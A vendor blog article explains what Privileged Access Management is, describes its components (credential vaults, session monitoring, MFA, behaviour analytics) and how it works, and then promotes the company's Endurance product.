Shielded Remote Desktop: A new term coined by Cosmikal?
14 de November de 2024What is a Connection Broker?
28 de November de 2024A PAM (Privileged Access Management) is a security solution designed to mitigate the risks associated with the use and abuse of accounts with elevated privileges.
These accounts, which can be human (administrators, developers, etc.) or non-human (services, automated applications, etc.), represent a critical entry point for both internal and external attackers due to their access to sensitive resources and control over systems.
The purpose of a PAM is to provide a comprehensive framework that combines control, monitoring, and protection of these privileged accesses, enabling organizations to adopt a stronger security posture against advanced cyber threats, both in on-premises environments and in hybrid and multicloud infrastructures.
Fundamental components of a PAM
1. Credential Management
- Encrypted storage:
Privileged credentials are stored in a secure vault (password vault) that uses advanced encryption algorithms, such as AES-256 and RSA-2048. This storage ensures that the credentials remain inaccessible even in the event of a server compromise. - Automatic Rotation:
PAM applies predefined policies to change passwords after each use or after specific intervals, significantly reducing the exposure time of compromised credentials. This process is automatically synchronized with the associated systems to ensure operational continuity. - Just-in-Time Access Control (JIT):
It provides temporary and on-demand access to assets, eliminating the need for continuous access and reducing the potential for abuse or theft.
2. Privileged Session Management (PSM)
- Active monitoring:
All sessions initiated by privileged users are intercepted and recorded through intermediate proxies that act as a control point. These recordings include keyboard inputs, mouse clicks, and system events, stored in encrypted and compressed formats. - Prevention of malicious activities:
The proxies monitor commands and actions executed within the session, blocking unauthorized operations in real time, such as attempts to run malicious scripts or transfer files to unapproved locations. - Support for multiple protocols:
It supports sessions based on RDP, SSH, HTTPS, and VDI, ensuring that any connection method used by privileged accounts is protected.
3. Granular Access Control:
- Context-Based Policies:
Access authorization is defined using contextual parameters such as geolocation, device status (via integration with EDR solutions), working hours, and the user’s role within the organization. - Segmented Access:
Allows partitioning of resources within the same system, restricting access to specific functions, such as reading logs without allowing configuration modifications.
4. Multifactor Authentication (MFA)
- Additional Security Layers:
Combines traditional authentication methods (passwords) with biometric factors (fingerprints, facial recognition), physical tokens (YubiKeys), or dynamically generated codes (OTP). - Resilience against attacks:
It protects against advanced techniques such as phishing, man-in-the-middle (MITM) attacks, and exploitation of static credentials by enforcing multiple layers of authentication.
5. Integration with IT Infrastructures:
- Extensive Compatibility:
Modern PAM solutions integrate with multiple ITSM solutions, virtualization systems (VMware, Citrix), cloud providers (AWS, Azure, Google Cloud), and OT/IoT environments, enabling unified privileged access management. - Automation through APIs:
They offer RESTful APIs to facilitate programmatic interaction with other systems, enabling the orchestration of automated workflows related to access management.
6. Behavior Analysis of Users and Entities (UEBA)
- Baseline Behavior Modeling:
It uses machine learning algorithms to establish normal behavior patterns for users and entities, generating alerts when significant deviations occur. - Real-time assessment:
It integrates real-time detection capabilities to identify suspicious activities, such as privilege escalation attempts or access outside of normal hours.
Functioning of a PAM
1. Authentication:
- When a user requests privileged access, the PAM initiates an authentication flow that combines MFA with specific policies, such as allowing access only from approved devices registered in an MDM solution.
2. Permission Assignment:
- Based on the Zero Trust principle, the system does not assume inherent trust in any user or device, verifying each requested access against dynamic, adaptive access policies.
3. Credential Management:
- Credentials are never directly exposed to the user. Instead, the PAM establishes an authenticated session through an intermediary system, managing login and logout automatically.
4. Session monitoring:
- Through proxy technologies, the PAM captures metadata of each interaction, such as commands executed in SSH terminals or paths accessed in RDP connections, ensuring a complete and detailed history of every session.
5. Report and alert generation:
- The collected data is processed using advanced analytics tools to identify trends, provide compliance reports, and generate proactive alerts.
Endurance, complete solution.
Endurance exceeds the traditional PAM standards by implementing features such as:
1. Shielded remote desktop:
- It provides a fully isolated environment from the client device to the privileged resources, ensuring that neither malware on the user’s device nor exfiltration tools can interfere.
2. OT/IT Integration:
- Designed to manage not only IT systems but also physical assets (telecommunication antennas, industrial control valves), ensuring operational continuity in critical OT environments.
3. VDI with Extreme Control:
- VDI environments are dynamically generated with predefined configurations, ensuring that each session is completely isolated from others. Once the session ends, these instances are destroyed, eliminating any persistence.
4. Microsegmentation Management:
- Ability to restrict privileged connections within virtualized or physical networks, ensuring that users can only interact with the nodes that are strictly necessary.
With PAM functionalities, Endurance is a comprehensive solution that integrates advanced technologies to provide seamless protection in the most challenging environments. In conclusion, in an increasingly threat-laden landscape, this solution not only meets modern security requirements but also sets new standards for privileged access management.